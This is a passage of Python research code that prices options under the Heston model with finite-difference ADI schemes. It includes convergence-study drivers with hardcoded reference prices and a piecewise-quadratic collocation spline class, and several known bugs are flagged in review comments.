            Y2t = lu2.solve(Y1r)
            F = Y2t
    elif method == "DO":
        a = 0.5
        lu1 = sla.splu(I+a*A1+BC)
        lu2 = sla.splu(I+a*A2+BC)
        for i in range(N):
            # BUG(review): Y0r is referenced here before it is assigned on
            # the first iteration (NameError when method == "DO"); the
            # argument was presumably meant to be F.
            updatePayoffExplicitTrans(Y0r,Sc,B,iBarrierList,M,L)
            Y0 = F-(A0+A1+A2)*F #explicit
            Y0r = Y0+a*(A1*F)
            updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
            Y1 = lu1.solve(Y0r)
            Y1r = Y1+a*(A2*F)
            updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
            Y2 = lu2.solve(Y1r)
            F = Y2
        # A1tri*=a
        # A1tri[1,:]+=1
        # A2tri*=a
        # A2tri[1,:]+=1
        # for i in range(N):
        #    Y0 = F-(A0+A1+A2)*F #explicit
        #    Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
        #    Y1t = Y1+a*(A2*F)
        #    Y1t = Y1t[indicesInv]
        #    Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
        #    Y2 = Y2t[indices]
        #    #print("indices",indices)
        #    #print("indicesInv",indicesInv)
        #    #print("Zero?")
        #    #print(A2*Y2-(Y1+a*A2*F))
        #    F = Y2
        #    #raise Exception("print")
    elif method == "PR": #peaceman-rachford strikwerda
        a = 0.5
        if B == 0:
            # No barrier: both directional systems stay tridiagonal, use
            # the fast banded solvers.
            A1tri*=a
            A1tri[1,:]+=1
            # A1tri[0]+= BCtri[0]
            # A1tri[1]+= BCtri[1]
            # A1tri[-1]+= BCtri[-1]
            A2tri*=a
            A2tri[1,:]+=1
            # A2tri[0] += BC2tri[0]
            # A2tri[1] += BC2tri[1]
            # A2tri[-1] += BC2tri[-1]
            if damping == "One":
                Y1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
                Y1t = Y1[indicesInv]
                Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=False, check_finite=False)
                Y2t = la.solve_banded((1, 1), A2tri, Y2t, overwrite_ab=False,overwrite_b=False, check_finite=False)
                Y2 = Y2t[indices]
                Y1 = la.solve_banded((1, 1), A1tri, Y2, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F = Y1
                N -= 1
            #
            # #A2triM = dia_matrix((A2tri,[1,0,-1]),shape=(M*L,M*L))
            for i in range(N):
                #updatePayoffExplicitTrans(F,S,B,iBarrierList,M,L)
                Y0 = F-a*(A2*F)
                Y1 = la.solve_banded((1, 1), A1tri,Y0, overwrite_ab=False,overwrite_b=True, check_finite=False)
                Y1t = Y1-a*(A1*Y1)
                Y1t = Y1t[indicesInv]
                Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
                F = Y2t[indices]
        else:
            #second system is not tridiag because of boundary
            # Time-dependent barrier: Sc, the barrier indices and the whole
            # system are rebuilt at each (half) step and solved via splu.
            ti=T
            dt = 1.0/N
            updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L) #FIXME ideally mirror F[ib-1] from F[ib]
            if damping == "One":
                ti -= dt*0.5
                Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                lu1 = sla.splu(I+a*A1+BC)
                F = lu1.solve(F)
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                lu2 = sla.splu(I+a*A2+BC)
                F = lu2.solve(F)
                ti -= dt*0.5
                Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                lu2 = sla.splu(I+a*A2+BC)
                F = lu2.solve(F)
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                lu1 = sla.splu(I+a*A1+BC)
                F = lu1.solve(F)
                N-=1
            for i in range(N): #PROBLEM: BOUNDARY is NEUMAN, NOT DIRICHLET=>breaks
                # Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                # for j in range(L):
                #    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                # Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                ti -= dt*0.5
                Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                # updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
                Y0 = (I)*F-a*(A2*F)
                updatePayoffBoundaryTrans(Y0,Sc,B,iBarrierList,M,L)
                lu1 = sla.splu(I+a*A1+BC)
                Y1 = lu1.solve(Y0)
                Y1t = (I)*Y1-a*(A1*Y1)
                # updatePayoffExplicitTrans(Y1t,Sc,B,iBarrierList,M,L) #FIXME ideally mirror F[ib-1] from F[ib]
                updatePayoffBoundaryTrans(Y1t,Sc,B,iBarrierList,M,L)
                lu2 = sla.splu(I+a*A2+BC)
                Y2 = lu2.solve(Y1t)
                F = Y2
                ti -= dt*0.5
                # Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                # for j in range(L):
                #    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                # Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                # updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
    elif method == "CN":
        A = A0+A1+A2
        a = 0.5
        Li = I+a*A+BC
        Le = I-(1-a)*A
        lu = sla.splu(Li)
        for i in range(N):
            #updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
            Y0 = Le*F
            updatePayoffBoundaryTrans(Y0,Sc,B,iBarrierList,M,L)
            F = lu.solve(Y0)
    elif method == "PRLS":
        a = 1 - math.sqrt(2)/2
        #a*=0.5
        Li = I+a*A1
        lu = sla.splu(Li)
        lu2 = sla.splu(I+a*(A0+A2))
        for i in range(N): #TODO try TR like PR (A1 then A2) then BDF2 on Y2,A1 and BDF2 on Y2,A2.
            F1 = lu.solve(F)
            F1t = lu2.solve(F1)
            F1t = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
            F2 = lu2.solve(F1t)
            F2t = lu.solve(F2)
            F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
    elif method == "SLSB":
        a = 1 - math.sqrt(2)/2
        a*=0.5
        Li = I+a*A1
        lu = sla.splu(Li)
        lu2 = sla.splu(I+a*(A0+A2))
        for i in range(N):
            F1 = lu2.solve(F)
            F1t = lu2.solve(F1)
            F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
            F2 = lu.solve(F)
            F2t = lu.solve(F2)#strang splitting?
            F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
            F1 = lu.solve(F)
            F1t = lu.solve(F1)
            F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
            F2 = lu2.solve(F)
            F2t = lu2.solve(F2)
            F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
    elif method == "Glowinski":
        a = 1 - math.sqrt(2)/2
        a2 = 1 - 2*a
        lu = sla.splu(I+a*A2+BC)
        lu2 = sla.splu(I+a2*(A0+A1)+BC)
        for i in range(N):
            Ft = F - a*A1*F
            updatePayoffBoundaryTrans(Ft,Sc,B,iBarrierList,M,L)
            F1 = lu.solve(Ft)
            F1t = F1 - a2*A2*F1
            updatePayoffBoundaryTrans(F1t,Sc,B,iBarrierList,M,L)
            F2 = lu2.solve(F1t)
            F2t = F2 - a*A1*F2
            updatePayoffBoundaryTrans(F2t,Sc,B,iBarrierList,M,L)
            F = lu.solve(F2t)
    elif method == "SLS":
        a = 1 - math.sqrt(2)/2
        if B == 0:
            A1tri*= a*0.5
            A1tri[1,:]+=1
            # A1tri[0]+= BCtri[0]
            # A1tri[1]+= BCtri[1]
            # A1tri[-1]+= BCtri[-1]
            A2tri*=a
            A2tri[1,:]+=1
            # A2tri[0] += BC2tri[0]
            # A2tri[1] += BC2tri[1]
            # A2tri[-1] += BC2tri[-1]
            for i in range(N):
                F1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F1b = la.solve_banded((1, 1), A1tri, F1, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F = (1+math.sqrt(2))*F1b - math.sqrt(2)*F1
                Ft = F[indicesInv]
                F2t = la.solve_banded((1, 1), A2tri, Ft, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F2bt = la.solve_banded((1, 1), A2tri, F2t, overwrite_ab=False,overwrite_b=False, check_finite=False)
                Ft = (1+math.sqrt(2))*F2bt - math.sqrt(2)*F2t
                F = Ft[indices]
                F1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F1b = la.solve_banded((1, 1), A1tri, F1, overwrite_ab=False,overwrite_b=False, check_finite=False)
                F = (1+math.sqrt(2))*F1b - math.sqrt(2)*F1
        else:
            dt = T/N
            for i in range(N):
                ti = T - i*dt
                Sc = np.array([cFunc.evaluate(ti+0.5*dt, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                luh = sla.splu(I+0.5*a*A1+BC)
                lu2 = sla.splu(I+a*(A0+A2)+BC)
                F1 = luh.solve(F)
                updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
                F1t = luh.solve(F1)
                F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                F2 = lu2.solve(F)
                updatePayoffBoundaryTrans(F2,Sc,B,iBarrierList,M,L)
                F2t = lu2.solve(F2)#strang splitting?
                F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                F1 = luh.solve(F)
                updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
                F1t = luh.solve(F1)
                F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
    else: #if method =="LS":
        a = 1 - math.sqrt(2)/2
        dt = -T/N
        if B==0:
            A = A0+A1+A2
            Li = I+a*A+BC
            lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
            for i in range(N):
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                F1 = lu.solve(F)
                updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
                F2 = lu.solve(F1)
                F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
                #F = np.maximum(F,0)
        else:
            for i in range(N):
                ti = T*(N-i)/N
                ti = ti+a*dt
                Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
                A = A0+A1+A2
                Li = I+a*A+BC
                lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
                F1 = lu.solve(F)
                ti = ti+a*dt
                Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
                for j in range(L):
                    iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
                Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
                updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
                A = A0+A1+A2
                Li = I+a*A+BC
                lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
                F2 = lu.solve(F1)
                F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
    end=time.time()
    #F[50+4*M]
    #S0=101.52
    # Interpolate the solution surface and report prices/Greeks.
    Payoff = F.reshape(L,M)
    # print("Payoff V=0",Payoff[0])
    # jv0 = np.searchsorted(V,v0)
    # print("Payoff V=V0",V[jv0])
    # for (si,pi) in zip(S[:M], Payoff[jv0]):
    #     print(si, pi)
    #
    # # istrike =np.searchsorted(S,K)
    # # print("Payoff S=K",S[istrike])
    # # for (vi,pi) in zip(V, Payoff[:][istrike]):
    # #     print(vi, pi)
    # #plt.ion()
    # plt.grid(True)
    # plt.plot(S[iBarrier:iBarrier+30], Payoff[jv0][iBarrier:iBarrier+30])
    # #plt.plot(V,Payoff[:][istrike])
    # plt.yscale('symlog',linthreshy=1e-6)
    # plt.show()
    #Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
    Payoffi = interpolate.RectBivariateSpline(V,X,Payoff,kx=3,ky=3,s=0)
    # Sp = np.exp(X-alpha*v0)
    # Vp = [(Payoffi(v0,x,dy=2)[0][0]-Payoffi(v0,x,dy=1)[0][0])*np.exp(-2*(x-alpha*v0)) for x in X]
    # for Si, Vi in zip(Sp,Vp):
    #     print(Si, "PR-Damped-S", Vi)
    #
    # plt.grid(True)
    # # plt.plot(np.exp(X-alpha*v0),[Payoffi(v0,x,dy=2)[0][0] for x in X])
    # plt.plot(Sp,Vp)
    # # z = z(y,v) = y - alpha*v, v= v => d/dy = d/dz*dz/dy
    # plt.show()
    maxError = 0.0
    # Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
    for spot,refPrice in zip(spotArray,priceArray):
        # Evaluate at x0 = ln(spot) + alpha*v0 on the transformed axis.
        x0 = math.log(spot)+alpha*v0
        price = Payoffi(v0,x0)[0][0]
        delta = Payoffi(v0,x0,dy=1)[0][0]
        gamma = Payoffi(v0,x0,dy=2)[0][0]
        error = price -refPrice
        if abs(error) > maxError:
            maxError = abs(error)
        if B==0:
            print(spot,method,N,M,L, price, delta,gamma,error,end-start)
    if B == 0:
        pass #print(method,N,M,L,maxError,end-start)
    else:
        x0 = math.log(K)+alpha*v0
        print(method,N,M,L,Payoffi(v0,x0)[0][0],end-start)
def priceAlbrecherSpace():
    """Spatial-convergence driver for the Albrecher Heston test case
    (vanilla call, no barrier): fixed time-step count, varying (L, M) grids,
    with reference prices for spots 80..120."""
    # Heston parameters.
    v0, kappa, theta, sigma, rho = 0.04, 1.5, 0.04, 0.3, -0.9
    r, q = 0.025, 0.0
    T, K, B = 1.0, 100.0, 0.0
    # Reference spots 80..120 and their benchmark call prices.
    spotArray = list(range(80, 121))
    priceArray = [0.4290429592804125, 0.5727996675731273, 0.7455984677403922, 0.9488855729391782, 1.1836198521834569, 1.4503166421285438, 1.7491038621459454, 2.079782505454696, 2.4418861283930053, 2.834736019523883, 3.257490337101448, 3.709186519701557, 4.188777097589518, 4.6951592762243415, 5.227198998513091, 5.7837501984978665, 6.363669958734282, 6.965830262856437, 7.589126920735202, 8.232486143930792, 8.894869093849636, 9.575277129770623, 10.272748751757314, 10.986365852615036, 11.715254013220457, 12.458577567319875, 13.215544738495424, 13.98540421747423, 14.767442110445812, 15.560982138391632, 16.36538729643898, 17.180051769091545, 18.004405483745735, 18.8379101967189, 19.68005854335592, 20.53036894075123, 21.388390582359417, 22.25369629176841, 23.12588767795124, 24.004578691901752, 24.889416575642677]
    M = 401  # X (spot) nodes
    L = 101  # V (variance) nodes
    # Full convergence ladders, then the pair actually run.
    Ms = [25, 51, 101, 201, 401]
    Ls = [12, 25, 51, 101, 201]
    Ms = [201]
    Ls = [31]
    N = 32  # time steps; ladder would be [4,8,16,32,64,128]
    for L, M in zip(Ls, Ms):
        priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceAlbrecherTime():
    """Temporal-convergence driver for the Albrecher Heston test case:
    fixed 201x101 grid, decreasing numbers of time steps."""
    v0, kappa, theta, sigma, rho = 0.04, 1.5, 0.04, 0.3, -0.9
    r, q = 0.025, 0.0
    T, K = 1.0, 100.0
    B = 0  # 90.0 to price the down-and-out variant
    spotArray = list(range(80, 121))
    priceArray = [0.4290429592804125, 0.5727996675731273, 0.7455984677403922, 0.9488855729391782, 1.1836198521834569, 1.4503166421285438, 1.7491038621459454, 2.079782505454696, 2.4418861283930053, 2.834736019523883, 3.257490337101448, 3.709186519701557, 4.188777097589518, 4.6951592762243415, 5.227198998513091, 5.7837501984978665, 6.363669958734282, 6.965830262856437, 7.589126920735202, 8.232486143930792, 8.894869093849636, 9.575277129770623, 10.272748751757314, 10.986365852615036, 11.715254013220457, 12.458577567319875, 13.215544738495424, 13.98540421747423, 14.767442110445812, 15.560982138391632, 16.36538729643898, 17.180051769091545, 18.004405483745735, 18.8379101967189, 19.68005854335592, 20.53036894075123, 21.388390582359417, 22.25369629176841, 23.12588767795124, 24.004578691901752, 24.889416575642677]
    M = 201  # X (spot) nodes
    L = 101  # V (variance) nodes
    for N in [2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4]:
        priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceBloombergSpace():
    """Spatial-convergence driver for the Bloomberg Heston test case,
    priced with the log-spot solver priceCallLog."""
    kappa, theta, sigma = 3.0, 0.12, 0.04
    rho = 0.6  # !FIXME breaks with - sign. : iStrike not in array!?
    r, q = 0.01, 0.04
    v0 = theta
    T, K, B = 1.0, 100.0, 0.0
    spotArray = list(range(80, 121))
    priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
    # Full convergence ladders, then the pair actually run.
    Ms = [25, 51, 101, 201, 401]
    Ls = [12, 25, 51, 101, 201]
    Ms = [51]
    Ls = [12]
    N = 32  # time steps; ladder would be [4,8,16,32,64,128]
    for L, M in zip(Ls, Ms):
        priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceBloombergTime():
    """Time-step convergence study for the Bloomberg vanilla case.

    Runs priceCallLog on a fixed (M, L) grid for a sweep of time-step
    counts N, coarsest first.
    """
    # Heston model parameters
    kappa = 3.0
    theta = 0.12
    sigma = 0.04
    rho = 0.6
    r = 0.01
    q = 0.04
    v0 = theta
    # Contract parameters
    T = 1.0
    K = 100.0
    # Reference spots 80..120 and corresponding reference prices.
    spotArray = list(range(80, 121))
    priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
    M = 101  # X
    L = 21  # V
    B = 0
    Ns = [2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4]  # timesteps
    Ns.reverse()  # coarsest first
    for N in Ns:
        priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma,
                     rho, r, q, T, K, B, N, M, L)
def priceQLBarrierTime():
    """Time-step convergence study for the QuantLib barrier test case.

    Same reference grid as the Bloomberg case, but with the QuantLib
    Heston parameter set and the isCall flag passed to priceCall.
    """
    # Heston model parameters
    kappa = 2.5
    theta = 0.04
    sigma = 0.66
    rho = -0.8
    r = 0.05
    q = 0.0
    v0 = theta
    # Contract parameters
    T = 1.0
    K = 100.0
    isCall = True
    # Reference spots 80..120 and corresponding reference prices.
    spotArray = list(range(80, 121))
    priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
    M = 101  # X
    L = 21  # V
    B = 0.
    Ns = [2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4]  # timesteps
    Ns.reverse()  # coarsest first
    for N in Ns:
        priceCall(isCall, spotArray, priceArray, v0, kappa, theta, sigma,
                  rho, r, q, T, K, B, N, M, L)
class IdentityFunction:
    """Trivial collocation map: evaluate(z) returns z unchanged.

    Drop-in stand-in wherever a CollocationFunction-style object is
    expected but no transformation should be applied.
    """

    def evaluate(self, z):
        """Return *z* unchanged."""
        return z
class CollocationFunction:
    """Piecewise-quadratic collocation spline with linear extrapolation.

    On the knot interval [X[i], X[i+1]] the terminal (t = T) map is
        g(z) = A[i] + h*(B[i] + h*C[i]),   h = z - X[i],
    and outside [X[0], X[-1]] it extrapolates linearly with leftSlope /
    rightSlope.  evaluate(t, z) blends linearly in time between the
    identity map at t = 0 and g at t = T.

    Fix vs. original: the attributes were mutable class-level lists
    shared by all instances; they are now plain instance attributes set
    in __init__.
    """

    def __init__(self, X, A, B, C, leftSlope, rightSlope, T):
        # X: sorted knots; A: values at knots; B, C: per-interval
        # first/second-order coefficients (len(X) - 1 entries each).
        self.X = X
        self.A = A
        self.B = B
        self.C = C
        self.leftSlope = leftSlope
        self.rightSlope = rightSlope
        self.T = T  # maturity used by evaluate() for time interpolation

    def evaluateSlice(self, z):
        """Evaluate the terminal (t = T) spline at z."""
        if z <= self.X[0]:
            return self.leftSlope * (z - self.X[0]) + self.A[0]
        elif z >= self.X[-1]:
            return self.rightSlope * (z - self.X[-1]) + self.A[-1]
        i = np.searchsorted(self.X, z)  # X[i-1] < z <= X[i]
        if i > 0:
            i -= 1
        h = z - self.X[i]
        return self.A[i] + h * (self.B[i] + h * self.C[i])

    def evaluate(self, t, z):
        # Linear interpolation between slice at t=0 (identity) and slice at T.
        return t / self.T * self.evaluateSlice(z) + (1.0 - t / self.T) * z

    def solve(self, strike):
        """Invert the terminal slice: return z with g(z) == strike.

        Raises Exception when no real root lies in the bracketing
        knot interval (should not happen for a monotone spline).
        """
        if strike < self.A[0]:
            return (strike - self.A[0]) / self.leftSlope + self.X[0]
        elif strike > self.A[-1]:
            return (strike - self.A[-1]) / self.rightSlope + self.X[-1]
        i = np.searchsorted(self.A, strike)  # A[i-1] < strike <= A[i]
        # Exact (to tolerance) hits on a knot value short-circuit.
        if abs(self.A[i] - strike) < 1e-10:
            return self.X[i]
        if abs(self.A[i - 1] - strike) < 1e-10:
            return self.X[i - 1]
        if i == 0:
            i += 1
        x0 = self.X[i - 1]
        c = self.C[i - 1]
        b = self.B[i - 1]
        a = self.A[i - 1]
        d = 0  # cubic term kept for generality; the pieces are quadratic
        # Rewrite a + b*(z-x0) + c*(z-x0)^2 + d*(z-x0)^3 - strike as a
        # polynomial in z (highest degree first for np.roots).
        cc = a + x0 * (-b + x0 * (c - d * x0)) - strike
        bb = b + x0 * (-2 * c + x0 * 3 * d)
        aa = -3 * d * x0 + c
        allck = np.roots([aa, bb, cc])
        for ck in allck:
            # Accept the (numerically) real root inside the interval.
            if abs(ck.imag) < 1e-10 and ck.real >= self.X[i - 1] - 1e-10 and ck.real <= self.X[i] + 1e-10:
                return ck.real
        raise Exception("no roots found in range", allck, strike, aa, bb, cc, i, self.X[i - 1], self.X[i])
def priceSX5ETime():
    """Time-step convergence study for the SX5E collocation case.

    Builds the collocation spline (1e-3 penalty coefficient set; the
    1e-5 set is assigned first and immediately overridden) and sweeps
    the number of time steps N on a fixed 128x128 grid.
    """
    # Spline, 1e-5 penalty (overridden below)
    A = [0.6287965835693049, 0.8796805556963849, 0.9548458991431029, 0.9978807937190832, 1.0432949917908245, 1.0951689975427406, 1.1780329537431, 1.2767467611605525]
    B = [0.846962887118158, 0.5006951388813219, 1.3162296284270554, 0.764281474912235, 1.4312564546785838, 1.0765792448141005, 0.9264392665602718]
    C = [-0.46500629962499923, 4.928351101396242, -6.670948501034147, 8.061184212984527, -4.286695020953507, -0.907309913530479, -1.9936316682418205]
    X = [0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
    leftSlope = 0.846962887118158
    rightSlope = 0.2666342520834516
    # Spline, 1e-3 penalty (effective coefficient set)
    A = [0.6266758553145932, 0.8838690008217314, 0.9511741483703275, 0.9972169412308787, 1.045230848712316, 1.0932361943842062, 1.1786839882076958, 1.2767419415280061]
    B = [0.8329310535215612, 0.5486175716699259, 1.0783076034285555, 1.1476195823811128, 1.173600641673776, 1.1472056638621118, 0.918270335988941]
    C = [-0.38180731761048253, 3.2009663415588276, 0.8377175268235754, 0.31401193651971954, -0.31901463307065175, -1.3834775717464938, -1.9682171790586938]
    X = [0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
    leftSlope = 0.8329310535215612
    rightSlope = 0.2668764075068484
    # Absorption 0.001 0
    # print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
    # print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
    # Heston model parameters
    kappa = 0.35
    theta = 0.321
    sigma = 1.388
    rho = -0.63
    r = 0.0
    q = 0.0
    v0 = 0.133
    T = 0.4986301369863014
    cFunc = CollocationFunction(X, A, B, C, leftSlope, rightSlope, T)
    # Contract parameters
    K = 1.0
    spotArray = [1.0]  # max(s-K) = max(s/K-1)*K
    priceArray = [0.07260310]
    priceArray = [0.07278065]
    # K=0.7
    # spotArray = [1.0]
    # priceArray = [0.30953450-0.3] #P = C- F-K
    # priceArray = [0.00960629]
    # K=1.4
    # spotArray = [1.0]
    # priceArray = [0.00015184+.4]
    # priceArray = [0.40015225]
    M = 128  # X
    L = 128  # V
    B = 0.8
    # Ns = [4096,2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
    Ns = [4096, 1024, 768, 512, 384, 256, 192, 128, 96, 64, 56, 48, 32, 24, 16, 12, 8, 6, 4]  # timesteps
    # Ns = [72,60,12]
    Ns.reverse()  # coarsest first
    for N in Ns:
        priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma,
                     rho, r, q, T, cFunc, K, B, N, M, L)
def priceSX5ESpace():
    """Spatial (grid-size) convergence study for the SX5E collocation case.

    Fixes vs. original: T is defined before the collocation function is
    built and is passed to CollocationFunction (its constructor requires
    the maturity T), and the Julia-style println() call — a NameError in
    Python — is replaced with print().
    """
    # Spline, 1e-5 penalty
